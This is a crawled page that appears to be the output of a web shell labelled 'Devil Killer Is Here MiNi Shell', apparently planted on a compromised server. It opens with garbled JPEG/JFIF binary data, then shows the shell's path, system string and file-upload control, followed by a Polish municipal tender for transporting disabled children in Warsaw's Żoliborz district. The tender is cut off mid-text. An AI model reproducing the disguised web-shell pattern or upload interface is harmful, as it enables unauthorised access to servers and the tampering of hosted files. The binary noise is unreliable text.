JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210708/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210708/0010813301-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00108133 z dnia 2021-07-08</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz dzieci niepełnosprawnych, zamieszkałych na terenie Dzielnicy Żoliborz, do przedszkoli, szkół i placówek oświatowych na trasie dom – jednostka oświatowa, jednostka oświatowa – dom, w roku szkolny </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Stołeczne Warszawa, Dzielnica Żoliborz</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 01525966300186</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Juliusza Słowackiego 6/8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">01-627</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">22 443 88 69</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">Zoliborz.WZP@um.warszawa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.zoliborz.org.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz dzieci niepełnosprawnych, zamieszkałych na terenie Dzielnicy Żoliborz, do przedszkoli, szkół i placówek oświatowych na trasie dom – jednostka oświatowa, jednostka oświatowa – dom, w roku szkolny </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0955addf-df11-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00108133</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001288/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.8 Dowóz zorganizowany dzieci niepełnosprawnych w roku szkolnym 2021/2022</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://www.zoliborz.org.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia.um.warszawa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja Zamawiającego z Wykonawcami odbywa się za pomocą środków komunikacji elektronicznej<br/>z wykorzystaniem Systemu Zakupowego Miasta Stołecznego Warszawy. Korzystanie z Systemu przez<br/>Wykonawców jest bezpłatne.1) Aby złożyć ofertę w postępowaniu Wykonawca jest zobowiązany do<br/>dokonania rejestracji w Systemie Zakupowym Miasta Stołecznego Warszawy dostępnym pod adresem:<br/>https://zamowienia.um.warszawa.plSystem Zakupowy Miasta Stołecznego Warszawy jest zintegrowany z<br/>platformą OnePlace Operatora Systemu. Zamawiający informuje, że przy pierwszym logowaniu się<br/>Wykonawców do Sytemu, konieczne jest przejście przez ścieżkę rejestracji do strefy dostawców<br/>OnePlace. Rejestracja Wykonawcy w Systemie następuje automatycznie poprzez weryfikację adresu email<br/>podanego przez Wykonawcę w formularzu rejestracyjnym. Zamawiający zaleca dokonanie rejestracji<br/>bez zbędnej zwłoki ponieważ proces weryfikacji Wykonawcy może potrwać do 2 dni roboczych.2)<br/>Szczegółowe informacje dotyczące sposobu rejestracji i logowania do Systemu, znajdują się Instrukcjach<br/>dla Wykonawcy na stronie internetowej prowadzonego postępowania w zakładce „Regulacje i procedury<br/>procesu zakupowego” pod adresem: https://zamowienia.um.warszawa.pl/servlet/HomeServlet?<br/>MP_module=main&MP_action=publicFilesList&clientName=umw&USER_MENU_HOVER=publicFilesList3)<br/>Po zarejestrowaniu i zalogowaniu się do Systemu Wykonawca uzyska dostęp do aplikacji umożliwiającej<br/>składanie wniosków, ofert i zadawanie pytań w postępowaniu. Komunikacja pomiędzy Wykonawcami a<br/>Zamawiającym będzie odbywała się za pomocą funkcjonalności Systemu. System umożliwia między<br/>innymi dokonywanie czynności złożenia oferty, wycofania oferty , złożenia pytań itd. 4) Za datę złożenia<br/>oferty, wniosków, zawiadomienia, dokumentu elektronicznego, oświadczenia lub elektronicznej kopii<br/>dokumentu lub oświadczenia, przyjmuje się datę przekazania (złożenia) w Systemie Zakupowym Miasta<br/>Stołecznego Warszawy do Zamawiającego. Moment złożenia oferty następuje wraz z zakończeniem<br/>procesu składania, tj. po kliknięciu przycisku „Złóż wniosek”/”Złóż ofertę”, elektronicznym podpisaniu<br/>formularza wniosku/oferty i wyświetleniu przez system komunikatu „Oferta złożona poprawnie”. W sekcji<br/>„Podsumowanie” na formularzu ofertowym wyświetli się dokładna data i godzina złożenia wniosku/oferty w<br/>polu „Data”.5) Kodowanie i czas odbioru danych:a) plik załączony i zapisany przez Wykonawcę, widoczny<br/>jest w Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert;b) oznaczenie czasu<br/>odbioru danych przez System stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego odpowiednim źródłem czasu - zegarem Głównego Urzędu Miar.6)<br/>Niezbędne wymagania sprzętowo- aplikacyjne, które musi spełniać komputer Wykonawcy:a) stały dostęp<br/>do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s na komputer;b) komputer<br/>PC/MAC z aktualnym systemem operacyjnym wspieranym przez producenta;c) zainstalowana<br/>przeglądarka wspierana przez producenta: MS Internet Explorer, Firefox, Google Chrome lub MS Edge;d)<br/>zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.Szczegółowe informacje<br/>wskazane są w Instrukcjach dla Wykonawcy dostępnych na stronie internetowej prowadzonego<br/>postępowania w zakładce „Regulacje i procedury procesu zakupowego” pod adresem:<br/>https://zamowienia.um.warszawa.pl/servlet/HomeServlet?<br/>MP_module=main&MP_action=publicFilesList&clientName=umw&USER_MENU_HOVER=publicFilesList7)<br/>Instrukcje dla Wykonawców, dotyczące składania ofert/wniosków, składania dokumentów elektronicznych,<br/>oświadczeń, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich<br/>użyciu Systemu, znajdują na stronie internetowej prowadzonego postępowania w zakładce „Regulacje i<br/>procedury procesu zakupowego” .</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zamawiający informuje, że w związku ze<br/>stosowaniemprocedury przeprowadzenia postępowania o udzielenie zamówienia publicznego przetwarza<br/>daneosobowe przekazane przez Wykonawców ubiegających się o udzielenie zamówienia publicznego.<br/>2.Dane osobowe, które znalazły się w posiadaniu Zamawiającego w wyniku prowadzenia postępowania<br/>sąprzetwarzane w celu wykonania czynności związanych z przeprowadzeniem postępowania,<br/>realizacjąumowy o udzielenie zamówienia publicznego oraz realizacją obowiązków ustawowych<br/>określonych wobowiązujących przepisach prawa.3. Wykonawca ubiegający się o udzielenie zamówienia<br/>publicznegobędzie zobowiązany do przekazania Zamawiającemu danych osobowych osób, które zostaną<br/>wskazanedo wykonania czynności związanych z realizacją umowy oraz danych kontaktowych<br/>umożliwiającychwypełnienie przez Zamawiającego obowiązku informacyjnego, o którym mowa w art. 13<br/>ust. 1 i 2rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w<br/>sprawieochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnegoprzepływu takich danych oraz uchylenia dyrektywy 95/46/WE (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1),dalej „RODO”.4. Klauzula informacyjna dotycząca przetwarzania danych osobowych,<br/>stanowi załącznik nr7 do SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Z uwagi na regulacje ustawy Pzp oraz cel<br/>gromadzeniaiprzetwarzania danych osobowych nie przysługuje Pani/Panu: a) prawo do<br/>przenoszeniadanychosobowych o którym mowa w art. 20 RODO; b) prawo do usunięcia danych<br/>osobowych, w związkuz art.17 ust. 3 lit. b, d lub e RODO; c) prawo sprzeciwu, wobec przetwarzania<br/>danych osobowych napodstawieart. 21 RODO, gdyż podstawą prawną przetwarzania Pani/Pana danych<br/>osobowych jest art. 6ust. 1 lit. cRODO. Na podstawie art. 19 ust. 4 ustawy Pzp informuję, że: a)<br/>skorzystanie przez osobę,której daneosobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia,<br/>o którym mowa w art. 16RODO, niemoże skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia ani zmianąpostanowień umowyw sprawie zamówienia publicznego w zakresie niezgodnym z<br/>ustawą Pzp; b) wpostępowaniu oudzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o<br/>którym mowa wart. 18 ust. 1RODO, nie ogranicza przetwarzania danych osobowych do czasu<br/>zakończenia tegopostępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">UD-XVIII-WZP.271.19.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 559290,38 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 357655,56 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: „Dowóz dzieci niepełnosprawnych, zamieszkałych na terenie Dzielnicy Żoliborz do przedszkoli, szkół i placówek oświatowych na trasie dom – jednostka oświatowa, jednostka oświatowa – dom”<br/><br/>Usługa obejmuje:<br/>1.	Świadczenie w roku szkolnym 2021/2022 usługi transportowej w zakresie dowożenia dzieci niepełnosprawnych, zamieszkałych na terenie Dzielnicy Żoliborz do szkół i placówek oświatowych na trasie dom – jednostka oświatowa – dom wraz z zapewnieniem im opieki w czasie dowozu. Lista dzieci objętych dowożeniem stanowi załącznik nr 1 do Opisu przedmiotu zamówienia (dalej „OPZ”).<br/>2.	Dowożeniem objęte są dzieci niepełnosprawne w liczbie 26 uczęszczające do przedszkoli, szkół podstawowych i ponadpodstawowych oraz innych placówek wymienionych w art. 2 pkt 7 ustawy z 14 grudnia 2016 r. - Prawo oświatowe (Dz.U. z 2020 r. poz. 910 ze zm.). <br/>3.	Termin realizacji przedmiotu zamówienia ustala się na okres 12 miesięcy, przy czym rozpoczęcie usługi nastąpi 1 września 2021 r. a zakończenie 31 sierpnia 2022 r.<br/>4.	Z zastrzeżeniem ust. 5 Wykonawca będzie realizował usługę transportową we wszystkie dni nauki szkolnej, zgodnie z kalendarzem roku szkolnego 2021/2022, tj.: <br/>1)	przez 187 dni, począwszy od 1 września 2021 r. do 24 czerwca 2022 r. (placówki feryjne),<br/>2)	przez 227 dni, począwszy od 1 września 2021 r. do 31 sierpnia 2022 r. oraz max 15 dni w okresie wakacji, tj. w miesiącu lipcu i sierpniu, w zależności od indywidualnego planu pracy placówki (placówki nieferyjne).<br/>5.	Dowóz odbywa się we wszystkie dni nauki, zgodnie z kalendarzem roku szkolnego.<br/>6.	Powyższy kalendarz roku szkolnego w placówkach feryjnych uwzględnia 10 dniowy okres ferii zimowych w okresie od 31 stycznia 2022 r. do 13 lutego 2022 r.<br/>7.	Wykaz tras dowozu dzieci niepełnosprawnych zamieszkałych na terenie Dzielnicy Żoliborz, dowożonych przez przewoźnika, stanowią załącznik nr 1 do OPZ. Został on sporządzony przez Zamawiającego wg stanu wiedzy z dnia wszczęcia postępowania. Po podpisaniu umowy z wybranym Wykonawcą będzie on zaktualizowany w przypadku ewentualnych zmian w zakresie liczby dzieci oraz tras. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> W związku z możliwą zmianą liczby dzieci w okresie realizacji zamówienia Zamawiający:<br/>1. wprowadza prawo opcji, zgodnie z którym Zamawiający może w okresie obowiązywania umowy dokonać zwiększenia liczby dowożonych dzieci. Liczba dzieci, które mogą być objęte dowożeniem w ramach opcji to maksymalnie 2 osoby, a Wykonawca zobowiązany jest świadczyć usługę dowozu tych dzieci po cenach jednostkowych wskazanych w umowie.<br/>2.	Opcja zwiększenia liczby dowożonych dzieci będzie dotyczyła dzieci zgłoszonych do transportu, <br/>a nie ujętych w wykazie, na podstawie wniosku rodzica/opiekuna prawnego złożonego do Wydziału Oświaty i Wychowania w Dzielnicy Żoliborz. Wszelkie zmiany dotyczące zwiększenia lub zmniejszenia liczby dzieci objętych dowożeniem oraz zmian tras dowozu Zamawiający przekaże Wykonawcy usługi w formie pisemnej. <br/>3.	W przypadku zgłoszenia przez Zamawiającego dziecka z opcji, transport rozpocznie się w terminie do 7 dni od zawiadomienia.<br/><br/>Maksymalna wartość opcji: 32 500 zł netto. <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-09-01 do 2022-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenie zamówienia w trybie art. 305 pkt 1 w zw. z art. 214 ust. <br/>1 pkt 7 ustawy z dnia 11 września 2019 r. - Prawo zamówień publicznych (Dz.U. poz. 2019 ze zm.)<br/>polegającego na powtórzeniu podobnych usług dla zamówienia podstawowego, które jest zgodne z jego przedmiotem oraz całkowita wartość tego zamówienia została uwzględniona przy obliczaniu jego wartości w kwocie 135 055,56 zł netto.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Spośród ofert niepodlegających odrzuceniu, Zamawiający wybierze najkorzystniejszą ofertę kierując się kryteriami: <br/>1)	„Cena brutto” – waga 60% to jest 60 pkt<br/>2)	„Czas podstawienia samochodu zastępczego” – waga 40% to jest 40 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia samochodu zastępczego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1)	nie podlegają wykluczeniu z postępowania na podstawie przesłanek wskazanych przez Zamawiającego w rozdziale XIV SWZ;<br/>2)	spełniają warunki udziału w postępowaniu określone w ust. 2 poniżej.<br/>2.	O udzielenie zamówienia może ubiegać się Wykonawca, który spełni warunki udziału w postępowaniu dotyczące:<br/>1)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów, a mianowicie wykaże, że posiada uprawnienia do wykonywania krajowego transportu drogowego w zakresie przewozu osób samochodem osobowym lub pojazdem samochodowym przeznaczonym konstrukcyjnie do przewozu powyżej 7 i nie więcej niż 9 osób łącznie z kierowcą albo do wykonywania zawodu przewoźnika drogowego osób, zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym (Dz. U. z 2021 r. poz. 919, ze zm.), zachowujące ważność w okresie wykonywania zamówienia.<br/>W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców wystarczy, jeżeli co najmniej jeden z nich posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia są wymagane;<br/>2)	zdolności technicznej lub zawodowej, tj.:<br/>a)	w odniesieniu do niezbędnego doświadczenia – wykaże, że należycie wykonał, co najmniej 3 usługi – każda usługa:<br/>-	polegająca na wykonaniu przewozu osób niepełnosprawnych,<br/>-	realizowana w sposób ciągły przez okres minimum 6 miesięcy,<br/>-	o wartości nie mniejszej niż 200 000 zł brutto.<br/>Pod pojęciem „usługa” należy rozumieć realizację jednej umowy z jednym zamawiającym.<br/>Wykonawca może wykazać się realizacją usług z okresu ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie.<br/>Zamawiający dopuszcza, aby Wykonawca wykazał się usługą wykonywaną (w trakcie realizacji). W takim przypadku, część usługi faktycznie wykonana musi spełniać postawiony przez Zamawiającego warunek;<br/>b)	w odniesieniu do niezbędnego potencjału technicznego – wykaże, że dysponuje, co najmniej:<br/>-	5 dopuszczonymi do ruchu, odpowiednio oznakowanymi, pojazdami samochodowymi przystosowanymi do przewozu osób niepełnosprawnych i wyposażonymi w specjalistyczny sprzęt (rampy lub windy umożliwiające wjazd wózkiem z osobą niepełnosprawną, szyny do mocowania wózków itp.),<br/>-	2 dopuszczonymi do ruchu, odpowiednio oznakowanymi, pojazdami do przewozu osób.<br/>W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców wystarczy, że Wykonawcy spełnią warunek dotyczący zdolności technicznej lub zawodowej wspólnie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie Wykonawcy o aktualności informacji zawartych w Oświadczeniu z art. 125 ust. 1 ustawy PZP w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego – wzór oświadczenia stanowi załącznik nr 3 do SWZ.<br/>W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców, przedmiotowe dokumenty składa osobno każdy Wykonawca.<br/>W przypadku korzystania przez Wykonawcę z podmiotów udostępniających zasoby na warunkach określonych w art. 118 ustawy PZP, przedmiotowe dokumenty składa każdy z tych podmiotów;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu, dotyczących wymaganych uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, Zamawiający żąda od Wykonawcy:<br/>-	licencji na wykonywanie krajowego 